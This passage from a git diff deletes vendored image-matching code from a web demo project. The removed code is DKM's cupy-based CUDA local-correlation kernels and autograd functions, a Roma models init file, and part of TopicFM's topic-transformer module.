-class FileModeWarning(RequestsWarning, DeprecationWarning):
- """A file was opened in text mode, but Requests determined its binary length."""
-
-
-class RequestsDependencyWarning(RequestsWarning):
- """An imported dependency doesn't match the expected version range."""
diff --git a/spaces/Realcat/image-matching-webui/third_party/DKM/dkm/models/deprecated/local_corr.py b/spaces/Realcat/image-matching-webui/third_party/DKM/dkm/models/deprecated/local_corr.py
deleted file mode 100644
index 227d73b00be7efd7f64c32936b3dcdd7e5b4d123..0000000000000000000000000000000000000000
--- a/spaces/Realcat/image-matching-webui/third_party/DKM/dkm/models/deprecated/local_corr.py
+++ /dev/null
@@ -1,630 +0,0 @@
-import torch
-import torch.nn.functional as F
-
-try:
- import cupy
-except:
- print("Cupy not found, local correlation will not work")
-import re
-from ..dkm import ConvRefiner
-
-
-class Stream:
- device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
- if device == "cuda":
- stream = torch.cuda.current_stream(device=device).cuda_stream
- else:
- stream = None
-
-
-kernel_Correlation_rearrange = """
- extern "C" __global__ void kernel_Correlation_rearrange(
- const int n,
- const float* input,
- float* output
- ) {
- int intIndex = (blockIdx.x * blockDim.x) + threadIdx.x;
- if (intIndex >= n) {
- return;
- }
- int intSample = blockIdx.z;
- int intChannel = blockIdx.y;
- float dblValue = input[(((intSample * SIZE_1(input)) + intChannel) * SIZE_2(input) * SIZE_3(input)) + intIndex];
- __syncthreads();
- int intPaddedY = (intIndex / SIZE_3(input)) + 4;
- int intPaddedX = (intIndex % SIZE_3(input)) + 4;
- int intRearrange = ((SIZE_3(input) + 8) * intPaddedY) + intPaddedX;
- output[(((intSample * SIZE_1(output) * SIZE_2(output)) + intRearrange) * SIZE_1(input)) + intChannel] = dblValue;
- }
-"""
-
-kernel_Correlation_updateOutput = """
- extern "C" __global__ void kernel_Correlation_updateOutput(
- const int n,
- const float* rbot0,
- const float* rbot1,
- float* top
- ) {
- extern __shared__ char patch_data_char[];
- float *patch_data = (float *)patch_data_char;
- // First (upper left) position of kernel upper-left corner in current center position of neighborhood in image 1
- int x1 = blockIdx.x + 4;
- int y1 = blockIdx.y + 4;
- int item = blockIdx.z;
- int ch_off = threadIdx.x;
- // Load 3D patch into shared shared memory
- for (int j = 0; j < 1; j++) { // HEIGHT
- for (int i = 0; i < 1; i++) { // WIDTH
- int ji_off = (j + i) * SIZE_3(rbot0);
- for (int ch = ch_off; ch < SIZE_3(rbot0); ch += 32) { // CHANNELS
- int idx1 = ((item * SIZE_1(rbot0) + y1+j) * SIZE_2(rbot0) + x1+i) * SIZE_3(rbot0) + ch;
- int idxPatchData = ji_off + ch;
- patch_data[idxPatchData] = rbot0[idx1];
- }
- }
- }
- __syncthreads();
- __shared__ float sum[32];
- // Compute correlation
- for (int top_channel = 0; top_channel < SIZE_1(top); top_channel++) {
- sum[ch_off] = 0;
- int s2o = top_channel % 9 - 4;
- int s2p = top_channel / 9 - 4;
- for (int j = 0; j < 1; j++) { // HEIGHT
- for (int i = 0; i < 1; i++) { // WIDTH
- int ji_off = (j + i) * SIZE_3(rbot0);
- for (int ch = ch_off; ch < SIZE_3(rbot0); ch += 32) { // CHANNELS
- int x2 = x1 + s2o;
- int y2 = y1 + s2p;
- int idxPatchData = ji_off + ch;
- int idx2 = ((item * SIZE_1(rbot0) + y2+j) * SIZE_2(rbot0) + x2+i) * SIZE_3(rbot0) + ch;
- sum[ch_off] += patch_data[idxPatchData] * rbot1[idx2];
- }
- }
- }
- __syncthreads();
- if (ch_off == 0) {
- float total_sum = 0;
- for (int idx = 0; idx < 32; idx++) {
- total_sum += sum[idx];
- }
- const int sumelems = SIZE_3(rbot0);
- const int index = ((top_channel*SIZE_2(top) + blockIdx.y)*SIZE_3(top))+blockIdx.x;
- top[index + item*SIZE_1(top)*SIZE_2(top)*SIZE_3(top)] = total_sum / (float)sumelems;
- }
- }
- }
-"""
-
-kernel_Correlation_updateGradFirst = """
- #define ROUND_OFF 50000
- extern "C" __global__ void kernel_Correlation_updateGradFirst(
- const int n,
- const int intSample,
- const float* rbot0,
- const float* rbot1,
- const float* gradOutput,
- float* gradFirst,
- float* gradSecond
- ) { for (int intIndex = (blockIdx.x * blockDim.x) + threadIdx.x; intIndex < n; intIndex += blockDim.x * gridDim.x) {
- int n = intIndex % SIZE_1(gradFirst); // channels
- int l = (intIndex / SIZE_1(gradFirst)) % SIZE_3(gradFirst) + 4; // w-pos
- int m = (intIndex / SIZE_1(gradFirst) / SIZE_3(gradFirst)) % SIZE_2(gradFirst) + 4; // h-pos
- // round_off is a trick to enable integer division with ceil, even for negative numbers
- // We use a large offset, for the inner part not to become negative.
- const int round_off = ROUND_OFF;
- const int round_off_s1 = round_off;
- // We add round_off before_s1 the int division and subtract round_off after it, to ensure the formula matches ceil behavior:
- int xmin = (l - 4 + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4)
- int ymin = (m - 4 + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4)
- // Same here:
- int xmax = (l - 4 + round_off_s1) - round_off; // floor (l - 4)
- int ymax = (m - 4 + round_off_s1) - round_off; // floor (m - 4)
- float sum = 0;
- if (xmax>=0 && ymax>=0 && (xmin<=SIZE_3(gradOutput)-1) && (ymin<=SIZE_2(gradOutput)-1)) {
- xmin = max(0,xmin);
- xmax = min(SIZE_3(gradOutput)-1,xmax);
- ymin = max(0,ymin);
- ymax = min(SIZE_2(gradOutput)-1,ymax);
- for (int p = -4; p <= 4; p++) {
- for (int o = -4; o <= 4; o++) {
- // Get rbot1 data:
- int s2o = o;
- int s2p = p;
- int idxbot1 = ((intSample * SIZE_1(rbot0) + (m+s2p)) * SIZE_2(rbot0) + (l+s2o)) * SIZE_3(rbot0) + n;
- float bot1tmp = rbot1[idxbot1]; // rbot1[l+s2o,m+s2p,n]
- // Index offset for gradOutput in following loops:
- int op = (p+4) * 9 + (o+4); // index[o,p]
- int idxopoffset = (intSample * SIZE_1(gradOutput) + op);
- for (int y = ymin; y <= ymax; y++) {
- for (int x = xmin; x <= xmax; x++) {
- int idxgradOutput = (idxopoffset * SIZE_2(gradOutput) + y) * SIZE_3(gradOutput) + x; // gradOutput[x,y,o,p]
- sum += gradOutput[idxgradOutput] * bot1tmp;
- }
- }
- }
- }
- }
- const int sumelems = SIZE_1(gradFirst);
- const int bot0index = ((n * SIZE_2(gradFirst)) + (m-4)) * SIZE_3(gradFirst) + (l-4);
- gradFirst[bot0index + intSample*SIZE_1(gradFirst)*SIZE_2(gradFirst)*SIZE_3(gradFirst)] = sum / (float)sumelems;
- } }
-"""
-
-kernel_Correlation_updateGradSecond = """
- #define ROUND_OFF 50000
- extern "C" __global__ void kernel_Correlation_updateGradSecond(
- const int n,
- const int intSample,
- const float* rbot0,
- const float* rbot1,
- const float* gradOutput,
- float* gradFirst,
- float* gradSecond
- ) { for (int intIndex = (blockIdx.x * blockDim.x) + threadIdx.x; intIndex < n; intIndex += blockDim.x * gridDim.x) {
- int n = intIndex % SIZE_1(gradSecond); // channels
- int l = (intIndex / SIZE_1(gradSecond)) % SIZE_3(gradSecond) + 4; // w-pos
- int m = (intIndex / SIZE_1(gradSecond) / SIZE_3(gradSecond)) % SIZE_2(gradSecond) + 4; // h-pos
- // round_off is a trick to enable integer division with ceil, even for negative numbers
- // We use a large offset, for the inner part not to become negative.
- const int round_off = ROUND_OFF;
- const int round_off_s1 = round_off;
- float sum = 0;
- for (int p = -4; p <= 4; p++) {
- for (int o = -4; o <= 4; o++) {
- int s2o = o;
- int s2p = p;
- //Get X,Y ranges and clamp
- // We add round_off before_s1 the int division and subtract round_off after it, to ensure the formula matches ceil behavior:
- int xmin = (l - 4 - s2o + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4 - s2o)
- int ymin = (m - 4 - s2p + round_off_s1 - 1) + 1 - round_off; // ceil (l - 4 - s2o)
- // Same here:
- int xmax = (l - 4 - s2o + round_off_s1) - round_off; // floor (l - 4 - s2o)
- int ymax = (m - 4 - s2p + round_off_s1) - round_off; // floor (m - 4 - s2p)
- if (xmax>=0 && ymax>=0 && (xmin<=SIZE_3(gradOutput)-1) && (ymin<=SIZE_2(gradOutput)-1)) {
- xmin = max(0,xmin);
- xmax = min(SIZE_3(gradOutput)-1,xmax);
- ymin = max(0,ymin);
- ymax = min(SIZE_2(gradOutput)-1,ymax);
- // Get rbot0 data:
- int idxbot0 = ((intSample * SIZE_1(rbot0) + (m-s2p)) * SIZE_2(rbot0) + (l-s2o)) * SIZE_3(rbot0) + n;
- float bot0tmp = rbot0[idxbot0]; // rbot1[l+s2o,m+s2p,n]
- // Index offset for gradOutput in following loops:
- int op = (p+4) * 9 + (o+4); // index[o,p]
- int idxopoffset = (intSample * SIZE_1(gradOutput) + op);
- for (int y = ymin; y <= ymax; y++) {
- for (int x = xmin; x <= xmax; x++) {
- int idxgradOutput = (idxopoffset * SIZE_2(gradOutput) + y) * SIZE_3(gradOutput) + x; // gradOutput[x,y,o,p]
- sum += gradOutput[idxgradOutput] * bot0tmp;
- }
- }
- }
- }
- }
- const int sumelems = SIZE_1(gradSecond);
- const int bot1index = ((n * SIZE_2(gradSecond)) + (m-4)) * SIZE_3(gradSecond) + (l-4);
- gradSecond[bot1index + intSample*SIZE_1(gradSecond)*SIZE_2(gradSecond)*SIZE_3(gradSecond)] = sum / (float)sumelems;
- } }
-"""
-
-
-def cupy_kernel(strFunction, objectVariables):
- strKernel = globals()[strFunction]
-
- while True:
- objectMatch = re.search(r"(SIZE_)([0-4])(\()([^\)]*)(\))", strKernel)
-
- if objectMatch is None:
- break
-
- intArg = int(objectMatch.group(2))
-
- strTensor = objectMatch.group(4)
- intSizes = objectVariables[strTensor].size()
-
- strKernel = strKernel.replace(objectMatch.group(), str(intSizes[intArg]))
-
- while True:
- objectMatch = re.search(r"(VALUE_)([0-4])(\()([^\)]+)(\))", strKernel)
-
- if objectMatch is None:
- break
-
- intArgs = int(objectMatch.group(2))
- strArgs = objectMatch.group(4).split(",")
-
- strTensor = strArgs[0]
- intStrides = objectVariables[strTensor].stride()
- strIndex = [
- "(("
- + strArgs[intArg + 1].replace("{", "(").replace("}", ")").strip()
- + ")*"
- + str(intStrides[intArg])
- + ")"
- for intArg in range(intArgs)
- ]
-
- strKernel = strKernel.replace(
- objectMatch.group(0), strTensor + "[" + str.join("+", strIndex) + "]"
- )
-
- return strKernel
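-
-# For example, if the tensor passed as "input" has shape (2, 128, 32, 32), the
-# substitution above turns the literal "SIZE_1(input)" in the CUDA source into
-# "128" and "SIZE_3(input)" into "32", so the kernel is specialized to the
-# concrete tensor sizes before cupy compiles it.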
-
-
-try:
-
- @cupy.memoize(for_each_device=True)
- def cupy_launch(strFunction, strKernel):
- return cupy.RawModule(code=strKernel).get_function(strFunction)
-
-except:
- pass
-
-
-class _FunctionCorrelation(torch.autograd.Function):
- @staticmethod
- def forward(self, first, second):
- rbot0 = first.new_zeros(
- [first.size(0), first.size(2) + 8, first.size(3) + 8, first.size(1)]
- )
- rbot1 = first.new_zeros(
- [first.size(0), first.size(2) + 8, first.size(3) + 8, first.size(1)]
- )
-
- self.save_for_backward(first, second, rbot0, rbot1)
-
- first = first.contiguous()
- second = second.contiguous()
-
- output = first.new_zeros([first.size(0), 81, first.size(2), first.size(3)])
-
- if first.is_cuda == True:
- n = first.size(2) * first.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange", {"input": first, "output": rbot0}
- ),
- )(
- grid=tuple([int((n + 16 - 1) / 16), first.size(1), first.size(0)]),
- block=tuple([16, 1, 1]),
- args=[n, first.data_ptr(), rbot0.data_ptr()],
- stream=Stream,
- )
-
- n = second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange", {"input": second, "output": rbot1}
- ),
- )(
- grid=tuple([int((n + 16 - 1) / 16), second.size(1), second.size(0)]),
- block=tuple([16, 1, 1]),
- args=[n, second.data_ptr(), rbot1.data_ptr()],
- stream=Stream,
- )
-
- n = output.size(1) * output.size(2) * output.size(3)
- cupy_launch(
- "kernel_Correlation_updateOutput",
- cupy_kernel(
- "kernel_Correlation_updateOutput",
- {"rbot0": rbot0, "rbot1": rbot1, "top": output},
- ),
- )(
- grid=tuple([output.size(3), output.size(2), output.size(0)]),
- block=tuple([32, 1, 1]),
- shared_mem=first.size(1) * 4,
- args=[n, rbot0.data_ptr(), rbot1.data_ptr(), output.data_ptr()],
- stream=Stream,
- )
-
- elif first.is_cuda == False:
- raise NotImplementedError()
-
- return output
-
- @staticmethod
- def backward(self, gradOutput):
- first, second, rbot0, rbot1 = self.saved_tensors
-
- gradOutput = gradOutput.contiguous()
-
- assert gradOutput.is_contiguous() == True
-
- gradFirst = (
- first.new_zeros(
- [first.size(0), first.size(1), first.size(2), first.size(3)]
- )
- if self.needs_input_grad[0] == True
- else None
- )
- gradSecond = (
- first.new_zeros(
- [first.size(0), first.size(1), first.size(2), first.size(3)]
- )
- if self.needs_input_grad[1] == True
- else None
- )
-
- if first.is_cuda == True:
- if gradFirst is not None:
- for intSample in range(first.size(0)):
- n = first.size(1) * first.size(2) * first.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradFirst",
- cupy_kernel(
- "kernel_Correlation_updateGradFirst",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": gradOutput,
- "gradFirst": gradFirst,
- "gradSecond": None,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- gradOutput.data_ptr(),
- gradFirst.data_ptr(),
- None,
- ],
- stream=Stream,
- )
-
- if gradSecond is not None:
- for intSample in range(first.size(0)):
- n = first.size(1) * first.size(2) * first.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradSecond",
- cupy_kernel(
- "kernel_Correlation_updateGradSecond",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": gradOutput,
- "gradFirst": None,
- "gradSecond": gradSecond,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- gradOutput.data_ptr(),
- None,
- gradSecond.data_ptr(),
- ],
- stream=Stream,
- )
-
- elif first.is_cuda == False:
- raise NotImplementedError()
-
- return gradFirst, gradSecond
-
-
-class _FunctionCorrelationTranspose(torch.autograd.Function):
- @staticmethod
- def forward(self, input, second):
- rbot0 = second.new_zeros(
- [second.size(0), second.size(2) + 8, second.size(3) + 8, second.size(1)]
- )
- rbot1 = second.new_zeros(
- [second.size(0), second.size(2) + 8, second.size(3) + 8, second.size(1)]
- )
-
- self.save_for_backward(input, second, rbot0, rbot1)
-
- input = input.contiguous()
- second = second.contiguous()
-
- output = second.new_zeros(
- [second.size(0), second.size(1), second.size(2), second.size(3)]
- )
-
- if second.is_cuda == True:
- n = second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange", {"input": second, "output": rbot1}
- ),
- )(
- grid=tuple([int((n + 16 - 1) / 16), second.size(1), second.size(0)]),
- block=tuple([16, 1, 1]),
- args=[n, second.data_ptr(), rbot1.data_ptr()],
- stream=Stream,
- )
-
- for intSample in range(second.size(0)):
- n = second.size(1) * second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradFirst",
- cupy_kernel(
- "kernel_Correlation_updateGradFirst",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": input,
- "gradFirst": output,
- "gradSecond": None,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- input.data_ptr(),
- output.data_ptr(),
- None,
- ],
- stream=Stream,
- )
-
- elif second.is_cuda == False:
- raise NotImplementedError()
-
- return output
-
- @staticmethod
- def backward(self, gradOutput):
- input, second, rbot0, rbot1 = self.saved_tensors
-
- gradOutput = gradOutput.contiguous()
-
- gradInput = (
- input.new_zeros(
- [input.size(0), input.size(1), input.size(2), input.size(3)]
- )
- if self.needs_input_grad[0] == True
- else None
- )
- gradSecond = (
- second.new_zeros(
- [second.size(0), second.size(1), second.size(2), second.size(3)]
- )
- if self.needs_input_grad[1] == True
- else None
- )
-
- if second.is_cuda == True:
- if gradInput is not None or gradSecond is not None:
- n = second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_rearrange",
- cupy_kernel(
- "kernel_Correlation_rearrange",
- {"input": gradOutput, "output": rbot0},
- ),
- )(
- grid=tuple(
- [int((n + 16 - 1) / 16), gradOutput.size(1), gradOutput.size(0)]
- ),
- block=tuple([16, 1, 1]),
- args=[n, gradOutput.data_ptr(), rbot0.data_ptr()],
- stream=Stream,
- )
-
- if gradInput is not None:
- n = gradInput.size(1) * gradInput.size(2) * gradInput.size(3)
- cupy_launch(
- "kernel_Correlation_updateOutput",
- cupy_kernel(
- "kernel_Correlation_updateOutput",
- {"rbot0": rbot0, "rbot1": rbot1, "top": gradInput},
- ),
- )(
- grid=tuple(
- [gradInput.size(3), gradInput.size(2), gradInput.size(0)]
- ),
- block=tuple([32, 1, 1]),
- shared_mem=gradOutput.size(1) * 4,
- args=[n, rbot0.data_ptr(), rbot1.data_ptr(), gradInput.data_ptr()],
- stream=Stream,
- )
-
- if gradSecond is not None:
- for intSample in range(second.size(0)):
- n = second.size(1) * second.size(2) * second.size(3)
- cupy_launch(
- "kernel_Correlation_updateGradSecond",
- cupy_kernel(
- "kernel_Correlation_updateGradSecond",
- {
- "rbot0": rbot0,
- "rbot1": rbot1,
- "gradOutput": input,
- "gradFirst": None,
- "gradSecond": gradSecond,
- },
- ),
- )(
- grid=tuple([int((n + 512 - 1) / 512), 1, 1]),
- block=tuple([512, 1, 1]),
- args=[
- n,
- intSample,
- rbot0.data_ptr(),
- rbot1.data_ptr(),
- input.data_ptr(),
- None,
- gradSecond.data_ptr(),
- ],
- stream=Stream,
- )
-
- elif second.is_cuda == False:
- raise NotImplementedError()
-
- return gradInput, gradSecond
-
-
-def FunctionCorrelation(reference_features, query_features):
- return _FunctionCorrelation.apply(reference_features, query_features)
-
-
-class ModuleCorrelation(torch.nn.Module):
- def __init__(self):
- super(ModuleCorrelation, self).__init__()
-
- def forward(self, tensorFirst, tensorSecond):
- return _FunctionCorrelation.apply(tensorFirst, tensorSecond)
-
-
-def FunctionCorrelationTranspose(reference_features, query_features):
- return _FunctionCorrelationTranspose.apply(reference_features, query_features)
-
-
-class ModuleCorrelationTranspose(torch.nn.Module):
- def __init__(self):
- super(ModuleCorrelationTranspose, self).__init__()
-
- def forward(self, tensorFirst, tensorSecond):
- return _FunctionCorrelationTranspose.apply(tensorFirst, tensorSecond)
-
-
-class LocalCorr(ConvRefiner):
- def forward(self, x, y, flow):
- """Computes the relative refining displacement in pixels for a given image x,y and a coarse flow-field between them
-
- Args:
- x ([type]): [description]
- y ([type]): [description]
- flow ([type]): [description]
-
- Returns:
- [type]: [description]
- """
- with torch.no_grad():
- x_hat = F.grid_sample(y, flow.permute(0, 2, 3, 1), align_corners=False)
- corr = FunctionCorrelation(x, x_hat)
- d = self.block1(corr)
- d = self.hidden_blocks(d)
- d = self.out_conv(d)
- certainty, displacement = d[:, :-2], d[:, -2:]
- return certainty, displacement
-
-
-if __name__ == "__main__":
- device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
- x = torch.randn(2, 128, 32, 32).to(device)
- y = torch.randn(2, 128, 32, 32).to(device)
- local_corr = LocalCorr(in_dim=81, hidden_dim=81 * 4)
- z = local_corr(x, y)
- print("hej")
diff --git a/spaces/Realcat/image-matching-webui/third_party/Roma/roma/models/__init__.py b/spaces/Realcat/image-matching-webui/third_party/Roma/roma/models/__init__.py
deleted file mode 100644
index 3918d67063b9ab7a8ced80c22a5e74f95ff7fd4a..0000000000000000000000000000000000000000
--- a/spaces/Realcat/image-matching-webui/third_party/Roma/roma/models/__init__.py
+++ /dev/null
@@ -1 +0,0 @@
-from .model_zoo import roma_outdoor, roma_indoor
diff --git a/spaces/Realcat/image-matching-webui/third_party/TopicFM/src/models/modules/transformer.py b/spaces/Realcat/image-matching-webui/third_party/TopicFM/src/models/modules/transformer.py
deleted file mode 100644
index cef17ca689cd0f844c1d6bd6c0f987a3e0c3be59..0000000000000000000000000000000000000000
--- a/spaces/Realcat/image-matching-webui/third_party/TopicFM/src/models/modules/transformer.py
+++ /dev/null
@@ -1,294 +0,0 @@
-from loguru import logger
-import copy
-import torch
-import torch.nn as nn
-import torch.nn.functional as F
-
-from .linear_attention import LinearAttention, FullAttention
-
-
-class LoFTREncoderLayer(nn.Module):
- def __init__(self, d_model, nhead, attention="linear"):
- super(LoFTREncoderLayer, self).__init__()
-
- self.dim = d_model // nhead
- self.nhead = nhead
-
- # multi-head attention
- self.q_proj = nn.Linear(d_model, d_model, bias=False)
- self.k_proj = nn.Linear(d_model, d_model, bias=False)
- self.v_proj = nn.Linear(d_model, d_model, bias=False)
- self.attention = LinearAttention() if attention == "linear" else FullAttention()
- self.merge = nn.Linear(d_model, d_model, bias=False)
-
- # feed-forward network
- self.mlp = nn.Sequential(
- nn.Linear(d_model * 2, d_model * 2, bias=False),
- nn.GELU(),
- nn.Linear(d_model * 2, d_model, bias=False),
- )
-
- # norm and dropout
- self.norm1 = nn.LayerNorm(d_model)
- self.norm2 = nn.LayerNorm(d_model)
-
- def forward(self, x, source, x_mask=None, source_mask=None):
- """
- Args:
- x (torch.Tensor): [N, L, C]
- source (torch.Tensor): [N, S, C]
- x_mask (torch.Tensor): [N, L] (optional)
- source_mask (torch.Tensor): [N, S] (optional)
- """
- bs = x.shape[0]
- query, key, value = x, source, source
-
- # multi-head attention
- query = self.q_proj(query).view(bs, -1, self.nhead, self.dim) # [N, L, (H, D)]
- key = self.k_proj(key).view(bs, -1, self.nhead, self.dim) # [N, S, (H, D)]
- value = self.v_proj(value).view(bs, -1, self.nhead, self.dim)
- message = self.attention(
- query, key, value, q_mask=x_mask, kv_mask=source_mask
- ) # [N, L, (H, D)]
- message = self.merge(message.view(bs, -1, self.nhead * self.dim)) # [N, L, C]
- message = self.norm1(message)
-
- # feed-forward network
- message = self.mlp(torch.cat([x, message], dim=2))
- message = self.norm2(message)
-
- return x + message
-
-
-class TopicFormer(nn.Module):
- """A Local Feature Transformer (LoFTR) module."""
-
- def __init__(self, config):
- super(TopicFormer, self).__init__()
-
- self.config = config
- self.d_model = config["d_model"]
- self.nhead = config["nhead"]
- self.layer_names = config["layer_names"]
- encoder_layer = LoFTREncoderLayer(
- config["d_model"], config["nhead"], config["attention"]
- )
- self.layers = nn.ModuleList(
- [copy.deepcopy(encoder_layer) for _ in range(len(self.layer_names))]
- )
-
- self.topic_transformers = (
- nn.ModuleList(
- [
- copy.deepcopy(encoder_layer)
- for _ in range(2 * config["n_topic_transformers"])
- ]
- )
- if config["n_samples"] > 0
- else None
- ) # nn.ModuleList([copy.deepcopy(encoder_layer) for _ in range(2)])
- self.n_iter_topic_transformer = config["n_topic_transformers"]
-
- self.seed_tokens = nn.Parameter(
- torch.randn(config["n_topics"], config["d_model"])
- )
- self.register_parameter("seed_tokens", self.seed_tokens)
- self.n_samples = config["n_samples"]
-
- self._reset_parameters()
-
- def _reset_parameters(self):
- for p in self.parameters():
- if p.dim() > 1:
- nn.init.xavier_uniform_(p)
-
- def sample_topic(self, prob_topics, topics, L):
- """
- Args:
- topics (torch.Tensor): [N, L+S, K]
- """
- prob_topics0, prob_topics1 = prob_topics[:, :L], prob_topics[:, L:]
- topics0, topics1 = topics[:, :L], topics[:, L:]
-
- theta0 = F.normalize(prob_topics0.sum(dim=1), p=1, dim=-1) # [N, K]
- theta1 = F.normalize(prob_topics1.sum(dim=1), p=1, dim=-1)
- theta = F.normalize(theta0 * theta1, p=1, dim=-1)
- if self.n_samples == 0:
- return None
- if self.training:
- sampled_inds = torch.multinomial(theta, self.n_samples)
- sampled_values = torch.gather(theta, dim=-1, index=sampled_inds)
- else:
- sampled_values, sampled_inds = torch.topk(theta, self.n_samples, dim=-1)
- sampled_topics0 = torch.gather(
- topics0,
- dim=-1,
- index=sampled_inds.unsqueeze(1).repeat(1, topics0.shape[1], 1),
- )
- sampled_topics1 = torch.gather(
- topics1,
- dim=-1,
- index=sampled_inds.unsqueeze(1).repeat(1, topics1.shape[1], 1),
- )
- return sampled_topics0, sampled_topics1
-
- def reduce_feat(self, feat, topick, N, C):
- len_topic = topick.sum(dim=-1).int()
- max_len = len_topic.max().item()
- selected_ids = topick.bool()
- resized_feat = torch.zeros(
- (N, max_len, C), dtype=torch.float32, device=feat.device
- )
- new_mask = torch.zeros_like(resized_feat[..., 0]).bool()
- for i in range(N):
- new_mask[i, : len_topic[i]] = True
- resized_feat[new_mask, :] = feat[selected_ids, :]
- return resized_feat, new_mask, selected_ids
-
- def forward(self, feat0, feat1, mask0=None, mask1=None):
- """
- Args:
- feat0 (torch.Tensor): [N, L, C]
- feat1 (torch.Tensor): [N, S, C]
- mask0 (torch.Tensor): [N, L] (optional)
- mask1 (torch.Tensor): [N, S] (optional)
- """
-
- assert (
- self.d_model == feat0.shape[2]
- ), "the feature number of src and transformer must be equal"
- N, L, S, C, K = (
- feat0.shape[0],
- feat0.shape[1],
- feat1.shape[1],
- feat0.shape[2],
- self.config["n_topics"],
- )
-
- seeds = self.seed_tokens.unsqueeze(0).repeat(N, 1, 1)
-
- feat = torch.cat((feat0, feat1), dim=1)
- if mask0 is not None:
- mask = torch.cat((mask0, mask1), dim=-1)
- else:
- mask = None
-
- for layer, name in zip(self.layers, self.layer_names):
- if name == "seed":
- # seeds = layer(seeds, feat0, None, mask0)
- # seeds = layer(seeds, feat1, None, mask1)
- seeds = layer(seeds, feat, None, mask)
- elif name == "feat":
- feat0 = layer(feat0, seeds, mask0, None)
- feat1 = layer(feat1, seeds, mask1, None)
-
- dmatrix = torch.einsum("nmd,nkd->nmk", feat, seeds)
- prob_topics = F.softmax(dmatrix, dim=-1)
-
- feat_topics = torch.zeros_like(dmatrix).scatter_(
- -1, torch.argmax(dmatrix, dim=-1, keepdim=True), 1.0
- )
-
- if mask is not None:
- feat_topics = feat_topics * mask.unsqueeze(-1)
- prob_topics = prob_topics * mask.unsqueeze(-1)
-
- if (feat_topics.detach().sum(dim=1).sum(dim=0) > 100).sum() <= 3:
- logger.warning("topic distribution is highly sparse!")
- sampled_topics = self.sample_topic(prob_topics.detach(), feat_topics, L)
- if sampled_topics is not None:
- updated_feat0, updated_feat1 = torch.zeros_like(feat0), torch.zeros_like(
- feat1
- )
- s_topics0, s_topics1 = sampled_topics
- for k in range(s_topics0.shape[-1]):
- topick0, topick1 = s_topics0[..., k], s_topics1[..., k] # [N, L+S]
- if (topick0.sum() > 0) and (topick1.sum() > 0):
- new_feat0, new_mask0, selected_ids0 = self.reduce_feat(
- feat0, topick0, N, C
- )
- new_feat1, new_mask1, selected_ids1 = self.reduce_feat(
- feat1, topick1, N, C
- )
- for idt in range(self.n_iter_topic_transformer):
- new_feat0 = self.topic_transformers[idt * 2](
- new_feat0, new_feat0, new_mask0, new_mask0
- )
- new_feat1 = self.topic_transformers[idt * 2](
- new_feat1, new_feat1, new_mask1, new_mask1
- )
- new_feat0 = self.topic_transformers[idt * 2 + 1](
- new_feat0, new_feat1, new_mask0, new_mask1
- )
- new_feat1 = self.topic_transformers[idt * 2 + 1](
- new_feat1, new_feat0, new_mask1, new_mask0
- )
- updated_feat0[selected_ids0, :] = new_feat0[new_mask0, :]
- updated_feat1[selected_ids1, :] = new_feat1[new_mask1, :]
-
- feat0 = (1 - s_topics0.sum(dim=-1, keepdim=True)) * feat0 + updated_feat0
- feat1 = (1 - s_topics1.sum(dim=-1, keepdim=True)) * feat1 + updated_feat1
-
- conf_matrix = (
- torch.einsum("nlc,nsc->nls", feat0, feat1) / C**0.5
- ) # (C * temperature)
- if self.training:
- topic_matrix = torch.einsum(
- "nlk,nsk->nls", prob_topics[:, :L], prob_topics[:, L:]
- )
- outlier_mask = torch.einsum(
- "nlk,nsk->nls", feat_topics[:, :L], feat_topics[:, L:]
- )
- else:
- topic_matrix = {"img0": feat_topics[:, :L], "img1": feat_topics[:, L:]}
- outlier_mask = torch.ones_like(conf_matrix)
- if mask0 is not None:
- outlier_mask = outlier_mask * mask0[..., None] * mask1[:, None] # .bool()
- conf_matrix.masked_fill_(~outlier_mask.bool(), -1e9)
- conf_matrix = F.softmax(conf_matrix, 1) * F.softmax(
- conf_matrix, 2
- ) # * topic_matrix
-
- return feat0, feat1, conf_matrix, topic_matrix
-
-
-class LocalFeatureTransformer(nn.Module):
- """A Local Feature Transformer (LoFTR) module."""
-
- def __init__(self, config):
- super(LocalFeatureTransformer, self).__init__()
-
- self.config = config
- self.d_model = config["d_model"]
- self.nhead = config["nhead"]
- self.layer_names = config["layer_names"]
- encoder_layer = LoFTREncoderLayer(
- config["d_model"], config["nhead"], config["attention"]
- )
- self.layers = nn.ModuleList(
- [copy.deepcopy(encoder_layer) for _ in range(2)]
- ) # len(self.layer_names))])
- self._reset_parameters()
-
- def _reset_parameters(self):
- for p in self.parameters():
- if p.dim() > 1:
- nn.init.xavier_uniform_(p)
-
- def forward(self, feat0, feat1, mask0=None, mask1=None):
- """
- Args:
- feat0 (torch.Tensor): [N, L, C]
- feat1 (torch.Tensor): [N, S, C]
- mask0 (torch.Tensor): [N, L] (optional)
- mask1 (torch.Tensor): [N, S] (optional)
- """
-
- assert (
- self.d_model == feat0.shape[2]
- ), "the feature number of src and transformer must be equal"
